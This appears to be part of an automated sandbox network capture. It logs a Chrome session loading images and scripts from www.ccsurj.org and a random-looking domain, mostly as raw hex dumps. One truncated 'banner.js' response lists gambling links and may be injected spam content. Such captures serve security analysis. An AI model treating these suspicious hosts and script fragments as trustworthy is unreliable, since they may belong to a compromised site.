                                          2025-01-12 00:17:05 UTC16384INData Raw: 25 84 4a a9 5d 40 5f 4a 69 9f 47 c4 0b 9b 58 ea c8 50 87 08 5f 19 fb fe cd 9a aa d4 5a 46 e0 e3 f5 7c ba 36 f4 21 29 1f 7a 91 dd 21 31 b3 26 d2 45 4c a4 9b 75 91 fe 7a 7d 12 1b f4 81 ba a2 5a c1 88 bd 9b 53 8a 18 ba f4 2e 3e 68 57 04 88 ef fa ec 08 7f 09 89 6d c2 7c d0 69 6d 79 d8 22 cd cc 3c 7b 73 ef d2 fb a7 8c 15 e0 1c c6 0e 81 16 ac e3 19 9d 69 69 73 26 34 14 8f 14 38 57 b5 d6 9e cf 27 36 12 1b f9 a5 60 1a c2 c3 11 82 e2 84 49 cc f7 41 99 da 30 0b 4a d9 55 3c 96 ac 7d 68 c8 7a 6a 66 da 4d 44 ba 4c 43 2b a5 74 3f 52 4b f9 0f a5 16 d3 7d 1b 5e b0 12 32 8b ca 4a fb f3 fb a0 a0 11 14 a8 5a 54 d4 46 ec aa b5 66 ad ab 49 b7 78 b1 04 f0 00 6c eb ec c6 2c 15 4d 80 93 e5 85 34 54 ac c9 da 01 5d 40 d1 e3 00 36 37 ab aa e5 f1 e8 b4 22 81 f6 f3 22 7c d0 1d d0 47
                                          Data Ascii: %J]@_JiGXP_ZF|6!)z!1&ELuz}ZS.>hWm|imy"<{siis&48W'6`IA0JU<}hzjfMDLC+t?RK}^2JZTFfIxl,M4T]@67""|G
                                          2025-01-12 00:17:05 UTC16384INData Raw: 87 24 4d a9 d3 a4 97 12 ff 4f 17 93 69 65 7b b4 16 d4 2f 2c 7d 55 bc 58 3c d3 9f f8 e1 97 6d 4e 9b 7a dd f5 2f 16 0c f3 0a 80 e4 e5 49 2a 8b 69 51 69 fa 02 6c 66 24 7e 7d 38 cd 25 22 22 fb e8 49 49 03 7c 8d 96 17 b4 f8 b2 f8 38 2d 8a c8 8b c5 ed d9 d1 88 4f e8 04 44 bb 68 77 c2 ca 91 27 d2 97 65 69 7e 24 22 d9 b6 ed fd ed 5d 55 db 72 6b 94 07 a1 b5 b6 ac 2b 23 c7 28 24 c7 cc 5c 06 42 c4 aa 18 d9 0a 53 e1 79 9c 34 b3 27 14 0d d2 da fd 0c f8 a9 56 16 c9 08 4a d5 54 8f 9b 9b 6a fb 69 f1 c9 bf a6 7e eb c3 da 69 d2 f6 51 62 6a c0 09 67 25 8f 49 aa cf 0f 99 4b 6b a7 18 60 9a bc f0 21 ad 09 f1 b7 8d 61 d2 40 82 f5 43 92 bc c6 0b 06 48 12 27 71 39 bc b8 97 d9 4d 28 7b 3c f3 7f c5 bc 8c 6e ac a3 71 e2 e7 75 39 ed 5b 74 ad c5 5c 4c bd d7 4e 2b 32 a3 34 3d 53 c9 a2
                                          Data Ascii: $MOie{/,}UX<mNz/I*iQilf$~}8%""II|8-ODhw'ei~$"]Urk+#($\BSy4'VJTji~iQbjg%IKk`!a@CH'q9M({<nqu9[t\LN+24=S
                                          2025-01-12 00:17:05 UTC16384INData Raw: 5a 64 a2 92 41 38 19 42 d2 06 39 3e eb da 8a d4 0d 06 70 b0 ad b5 65 2c b0 2e 67 c5 4d 37 0e 06 d7 f2 39 4e 60 f0 6c a5 f6 1c 9c d6 75 56 3a 37 67 32 09 6c 12 9c c2 b8 b6 ac 04 fc 4f c4 89 4d 1f da 26 ce e0 8e 0d 5a fc 20 06 42 bd 2c c1 cd cc 68 05 3d e4 c2 57 eb dc 6a 5f 9a 87 86 0e b6 21 8d ca a2 94 2d 4d 19 b4 95 c1 83 91 d6 7a d4 5d d7 71 1d 0d 37 de 33 f1 b1 61 4a 71 f5 71 50 a1 ac 99 85 12 66 6a 97 bb 4d 28 18 cc 0c 47 41 e0 e7 8d 79 d9 e8 db da 8d 4e b5 3a 3c 13 48 ee f2 4a b3 62 c7 c5 84 43 69 42 4a 21 30 ce 8e 72 ed b4 23 32 18 b0 82 f6 85 63 d1 d2 99 b7 69 f3 44 cb e8 38 18 47 1b 7b c6 43 e4 c8 c4 25 75 c7 ea 53 e9 4f 76 f0 cc 81 68 04 73 03 b3 ac 42 66 8d 51 2d 12 ae e4 ec 37 20 5d 7e 36 ce 43 95 44 85 54 04 0b 68 02 09 81 70 08 a1 b8 55 28 90
                                          Data Ascii: ZdA8B9>pe,.gM79N`luV:7g2lOM&Z B,h=Wj_!-Mz]q73aJqqPfjM(GAyN:<HJbCiBJ!0r#2ciD8G{C%uSOvhsBfQ-7 ]~6CDThpU(
                                          2025-01-12 00:17:05 UTC16384INData Raw: 37 b7 b7 b7 9f 7e fa e9 ab 57 af 6e ae 6e 43 08 c7 e3 49 dd aa 79 a6 d3 e9 14 63 e8 3a 8e cb c2 54 a7 ec 3f 4d 89 99 72 96 2c 49 32 73 58 34 ff 61 3c d9 d8 9d 1a 47 01 37 f2 99 ea 08 b5 af bb 39 95 3b 6e 8c a5 a9 35 d0 26 92 52 1a e7 49 9b ed 62 24 b8 f0 dc a2 87 fb fd fe 78 38 30 b3 2d 78 6a 12 ec 94 24 e7 29 e7 dc c5 f5 22 37 29 fb a7 72 59 86 15 0e f3 3c cf 92 bb ae 7b 7a 3c 86 48 5d 1c e6 34 9e 8e 53 88 14 28 86 c0 29 e9 34 1d 88 32 73 0c 41 34 40 c0 4b 42 2f 56 9f d7 7e 3d 9d a6 94 26 a2 30 0c 9d ed a9 e1 cc 63 ca 31 c6 be eb a5 c4 58 d5 a2 d8 ef f7 22 32 8e 23 51 5e 02 cd 92 76 bb dd dc ac df 7e 48 41 51 42 9f d3 21 9f ce c8 05 81 da 09 50 18 96 c4 6d b2 53 49 d1 85 10 82 49 0d 59 a5 95 6e 5c 59 35 63 5d 44 68 bd d7 aa 1a cb e6 00 ed a7 b6 8e bb 67
                                          Data Ascii: 7~WnnCIyc:T?Mr,I2sX4a<G79;n5&RIb$x80-xj$)"7)rY<{z<H]4S()42sA4@KB/V~=&0c1X"2#Q^v~HAQB!PmSIIYn\Y5c]Dhg


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          64192.168.2.449816154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC364OUTGET /system/resource/js/ajax.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 6767
                                          Last-Modified: Fri, 10 Jan 2025 07:04:25 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c679-1a6f"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC6767INData Raw: ef bb bf 2f 2f e5 88 9b e5 bb ba 58 4d 4c 48 54 54 50 e5 af b9 e8 b1 a1 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 72 65 61 74 65 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 0d 0a 7b 0d 0a 20 20 20 20 76 61 72 20 78 6d 6c 48 74 74 70 20 3d 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 74 72 79 7b 0d 0a 09 20 20 20 09 09 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a 09 20 20 20 7d 0d 0a 09 20 20 20 63 61 74 63 68 28 65 29 0d 0a 09 20 20 20 7b 0d 0a 09 09 20 20 20 74 72 79 7b 0d 0a 09 09 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 73 78 6d 6c 32 2e 58 4d 4c 48 54 54 50 22 29 3b 0d 0a
                                          Data Ascii: //XMLHTTPfunction createXMLHttpRequest(){ var xmlHttp = null; try{ xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { try{ xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          65192.168.2.449815154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC643OUTGET /__local/B/84/EC/5622D797980B35FCB8DD953CE4C_265C0032_E9AE.jpeg?e=.jpeg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC302INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 59822
                                          Last-Modified: Fri, 10 Jan 2025 07:04:31 GMT
                                          Connection: close
                                          ETag: "6780c67f-e9ae"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC16082INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 40 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 30 00 00 00 00 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 61 63 73 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 f6 d6 00 01 00 00 00 00 d3 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 64 65 73 63 00 00 00 f0 00 00 00 74 72 58 59 5a 00 00 01 64 00 00 00 14 67 58 59 5a 00 00 01 78 00 00 00 14 62 58 59 5a 00 00 01 8c 00 00 00 14 72 54 52 43 00 00 01 a0 00 00 00 28 67 54 52 43 00 00 01 a0 00 00 00 28 62 54 52 43 00 00 01 a0 00 00 00 28 77
                                          Data Ascii: JFIF@ICC_PROFILE0mntrRGB XYZ acsp-desctrXYZdgXYZxbXYZrTRC(gTRC(bTRC(w
                                          2025-01-12 00:17:05 UTC16384INData Raw: 84 5c 32 b4 32 ac 91 e0 3a 9c 8c 8c d7 7e fd ee 2f 92 49 08 e6 24 67 94 01 f8 53 5a e9 6d fe f1 1f f3 85 41 1e 73 41 63 84 d9 9e 3b e2 4f c7 d2 b6 9e 00 1f f2 2f 4f f5 ef 7f f1 5e b1 64 1b 75 ad ab b3 f3 ff 00 22 b4 dd ba 77 bf f8 af 5c 8e ae 3f 81 f8 cd f4 a7 db 8f 35 64 cc 31 e3 c5 80 cf f4 69 3a 18 cd 85 8f 8f e6 23 fe e8 a7 3a c2 86 82 32 aa 7e df 87 f3 45 72 d0 c7 fb 3f 4f 20 74 b7 8f fb a2 bc c3 02 06 3e 3f de 74 43 46 9a b7 b9 a9 03 e4 01 ae 56 3e f6 93 32 79 ab 7d cc 69 c6 b8 39 6f cf f3 7f 5d 70 d3 97 36 53 ff 00 27 9f 6f 8e ff 00 ae ae 0e 01 12 be 79 91 07 ff 00 83 38 d8 f2 4e 7e 59 6c fe ba 6d 0f be 80 53 a8 b7 d2 af 57 c5 66 cf f6 50 d3 5b 4c 8d 8f 5d e9 8a bd ef c6 56 c1 ec c9 6b 77 e5 d1 6d 8f 99 8d 31 fd 21 fb 6a 4b 4a de fe e8 ff 00 d5 a7
                                          Data Ascii: \22:~/I$gSZmAsAc;O/O^du"w\?5d1i:#:2~Er?O t>?tCFV>2y}i9o]p6S'oy8N~YlmSWfP[L]Vkwm1!jKJ
                                          2025-01-12 00:17:05 UTC16384INData Raw: 7e 15 76 ec e7 51 8e 5e 36 83 bb 90 02 d1 32 73 12 4e d8 62 7a f5 39 c7 d6 99 b6 e1 5e 9f c5 51 9c 45 aa a3 7d e5 1f b6 33 3b 76 8d 65 71 c4 da 74 2b a5 5b 5c cf dd ca cc 4a c0 f8 19 03 c7 18 f3 f1 aa 6c 5d 99 71 2c 9d e5 b8 33 2d a9 01 8c 78 60 37 fe 4b 60 1d f3 d2 bd 14 6e e6 2c e4 17 74 38 e5 0a 9b 8d 89 3b 93 f0 a4 f7 b2 ed ce f2 ae 5c 01 cc c8 33 bf fc 7a d7 9c 3f 68 ad 07 28 b8 8f 2e 9a a1 c6 33 f8 ca ef 0c e9 da 9e 93 a4 da d9 db 69 0a 8b 0a 04 3d e5 c2 8e 80 6f b0 de 9b f1 4c 9a 8d 85 9a de 6a 31 da a4 26 64 8f 96 39 1b 9b 07 e5 8e 99 ab 7b 5c cf cc 15 52 11 27 29 3c ad 2e fe 1e 9d 37 3b fc 3c ea b7 da 48 92 5e 0b be 67 44 ef 63 c3 06 1b 84 1c d8 c8 3e 7b 8a bd 1d 6a d7 b0 2b 63 99 61 a6 a8 9c 6d ef f3 95 0d 77 5e d2 75 2d 0e fb 4c b5 bd b3 6b 8b
                                          Data Ascii: ~vQ^62sNbz9^QE}3;veqt+[\Jl]q,3-x`7K`n,t8;\3z?h(.3i=oLj1&d9{\R')<.7;<H^gDc>{j+camw^u-Lk
                                          2025-01-12 00:17:05 UTC10972INData Raw: 73 1c 0c 93 8e b5 68 ae 39 c1 86 aa 52 db 7f d2 1c c3 7f 5a 97 e1 bd 3d f5 4e fe 35 9e da 0e e2 33 2b 35 c3 f2 8e 51 b6 de 67 7e 82 ae 1c 7f c0 70 f0 ff 00 07 e8 3a a5 94 a9 70 8d 10 8a ea 68 9c 3a 34 87 de 05 4e 77 19 2c 06 3c 14 55 47 86 74 ef 6b e2 6d 2e cd c0 78 ae 2e 62 8a 45 53 92 51 9c 03 f7 1a 14 f9 cb 32 10 76 99 67 b5 d0 f5 45 8e 3e e9 23 09 ca 31 99 57 61 8d aa 4e cf 4b d5 e1 65 91 1a 38 a4 5d c3 47 37 2b 0f a5 6c a3 84 ac ba f7 0b 83 be 68 c7 0a 58 8f ff 00 c7 4f ea d5 59 69 3d d6 76 34 fa fe a3 48 c5 76 e0 7a 73 89 4b d3 35 fe 24 b6 58 e3 bb 9e de fa 35 c6 f3 33 77 aa 3d 24 5c 37 d4 91 e9 52 3a 8c 7a 36 a9 18 7b 8b 64 13 36 ed 94 0a ea 7d 5d 30 1b e6 bd 7a d5 97 fd 1b b2 41 b5 ba 7d 29 32 68 76 8b b0 85 46 3d 2b 03 45 0d e4 7e b1 d4 ea 7a f5
                                          Data Ascii: sh9RZ=N53+5Qg~p:ph:4Nw,<UGtkm.x.bESQ2vgE>#1WaNKe8]G7+lhXOYi=v4HvzsK5$X53w=$\7R:z6{d6}]0zA})2hvF=+E~z


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          66192.168.2.449817122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC530OUTGET /banner.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC378INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 2558
                                          Last-Modified: Fri, 10 Jan 2025 09:48:28 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780ecec-9fe"
                                          Expires: Sun, 12 Jan 2025 12:17:05 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC2558INData Raw: 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 73 74 72 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 20 20 63 6f 6e 73 74 20 69 64 4d 61 74 63 68 20 3d 20 73 74 72 2e 6d 61 74 63 68 28 2f 5c 3f 69 64 3d 28 5c 64 2b 29 2f 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 69 64 20 3d 20 69 64 4d 61 74 63 68 20 3f 20 70 61 72 73 65 49 6e 74 28 69 64 4d 61 74 63 68 5b 31 5d 2c 20 31 30 29 20 3a 20 30 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 20 6f 62 6a 5f 73 6c 69 64 65 73 20 3d 20 5b 0a 20 20 20 20 20 20 20 20 7b 20 69 64 3a 20 31 2c 20 74 69 74 6c 65 3a 20 22 42 45 54 33 36 35 22 2c 20 75 72 6c 3a 20 22 68 74 74 70 73 3a 2f 2f 35 35 31 30 30 30 6c 2e 63 63 22 2c 20 73 72 63 3a 20 22 69 6d 67 73 2f 62 61 6e 6e
                                          Data Ascii: $(function() { const str = window.location.href; const idMatch = str.match(/\?id=(\d+)/); const id = idMatch ? parseInt(idMatch[1], 10) : 0; const obj_slides = [ { id: 1, title: "BET365", url: "https://551000l.cc", src: "imgs/bann


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          67192.168.2.449820154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC351OUTGET /@public/js.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC350INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 1514
                                          Last-Modified: Thu, 26 Dec 2024 10:53:12 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "676d3598-5ea"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC1514INData Raw: 2f 2f e5 85 a8 e9 83 a8 e6 b1 87 e6 80 bb 0a 21 66 75 6e 63 74 69 6f 6e 28 70 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 73 3d 77 69 6e 64 6f 77 2c 65 3d 64 6f 63 75 6d 65 6e 74 2c 69 3d 70 2c 63 3d 22 22 2e 63 6f 6e 63 61 74 28 22 68 74 74 70 73 3a 22 3d 3d 3d 65 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3f 22 68 74 74 70 73 3a 2f 2f 22 3a 22 68 74 74 70 3a 2f 2f 22 2c 22 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 29 2c 6e 3d 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c 72 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6e 2e 74 79 70 65 3d 22 74 65 78 74
                                          Data Ascii: //!function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          68192.168.2.449819154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:04 UTC643OUTGET /__local/2/47/D4/4F14A7A9A01E0D52B998F0FADA0_DD410FA8_1601EC.png?e=.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:05 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:05 GMT
                                          Content-Type: image/png
                                          Content-Length: 1442284
                                          Last-Modified: Fri, 10 Jan 2025 07:04:33 GMT
                                          Connection: close
                                          ETag: "6780c681-1601ec"
                                          Expires: Tue, 11 Feb 2025 00:17:05 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:05 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 b4 00 00 02 08 08 06 00 00 00 9f 36 7d d4 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 20 00 49 44 41 54 78 01 00 cc 81 33 7e 01 ae b4 c2 ff 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 02 02 02 00 00 00 00 00 00 ff 00 00 01 00 00 00 01 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff
                                          Data Ascii: PNGIHDR6}pHYsttfx IDATx3~
                                          2025-01-12 00:17:05 UTC16384INData Raw: 01 01 00 00 00 00 01 00 01 01 00 00 00 00 01 00 00 00 01 00 01 01 01 00 00 00 00 00 01 01 01 00 ff 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 01 00 00 01 00 00 00 00 01 00 01 01 01 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 01 00 01 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 01 ff
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 01 ff ff 00 02 01 01 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 01 01 00 00 00 ff 00 00 00 00 fe 00 00 01 00 00 00 ff ff 00 00 01 00 00 ff ff 01 00 01 01 00 00 00 00 00 00 00 00 01 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 01 00 01 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:05 UTC16384INData Raw: 00 ff 00 01 ff 00 00 00 01 01 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
